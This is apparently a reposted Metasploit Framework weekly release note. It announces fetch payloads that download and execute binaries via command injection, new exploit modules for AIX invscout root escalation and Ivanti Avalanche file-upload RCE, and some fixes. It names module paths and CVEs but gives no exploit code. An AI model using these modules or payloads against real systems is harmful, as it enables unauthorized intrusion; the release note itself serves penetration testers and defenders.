Newsy.co

Metasploit Weekly Wrap-Up

Fetch Based Payloads: Making the Path from Command Injection to Metasploit Session Shorter

Metasploit Weekly Wrap-Up

This week we’re releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that leverage network-enabled applications on remote hosts and different protocol servers to serve, download, and execute binary payloads. Over the last year, two thirds of the exploit modules landed to Metasploit Framework were command injection exploits. These exploits will be much easier to write with our new payloads.You can check out the documentation here, and we’ll have a longer blog post on the feature out soon.

New Exploit: Privilege Escalation for invscout RPM

AIX systems up to and including 7.2 were vulnerable to a command injection in the invscout utility. Tim Brown and bcoles created a new module to take advantage of this, giving privilege escalation to root in these systems. This addresses CVE-2023-28528. It’s available for Framework users now at use exploit/aix/local/invscout_rpm_priv_esc.

New module content (3)

invscout RPM Privilege Escalation

Authors: Tim Brown and bcoles
Type: Exploit
Pull request: #17993 contributed by bcoles
AttackerKB reference: CVE-2023-28528

Description: This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.

Ivanti Avalanche FileStoreConfig File Upload

Authors: Piotr Bazydlo and Shelby Pace
Type: Exploit
Pull request: #17979 contributed by space-r7
CVE reference: ZDI-23-456

Description: An exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM. This occurs due to Ivanti Avalanche not properly validating MS-DOS style short names in the configuration path.This occurs due to Ivanti Avalanche not properly validating MS-DOS style short names in the configuration path.

Fetch Based Payloads

Author: Brendan Watters
Type: Payload
Pull request: #17782 contributed by bwatters-r7

Description: This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.

Enhancements and features (3)

  • #17985 from spmedia - Fixes a typo in the post/windows/manage/sticky_keys module.
  • #17990 from bcoles - Adds AutoCheck functionality and notes metadata to exploits/aix/local/ibstat_path.
  • #17991 from rad10 - A default configuration file has been added for Solargraph, a language server that can help VS Code users (and users of other code editors that might not have a language server built in) obtain IntelliSense, in-line documentation, and code completion functionality for Metasploit's code. For VS Code users, it is recommended to install the Solargraph plugin here to take advantage of this change.

Bugs fixed (3)

  • #17967 from adfoster-r7 - Fixes Ruby 3.1 crashes and resource leaks when garbage collecting Meterpreter resources.
  • #18005 from adfoster-r7 - This fixes a crash when running a module through Socks4a proxy.
  • #18006 from adfoster-r7 - This fixes an error when msfconsole opens browser links without a display present.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

  • Pull Requests 6.3.16...6.3.17
  • Full diff 6.3.16...6.3.17

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).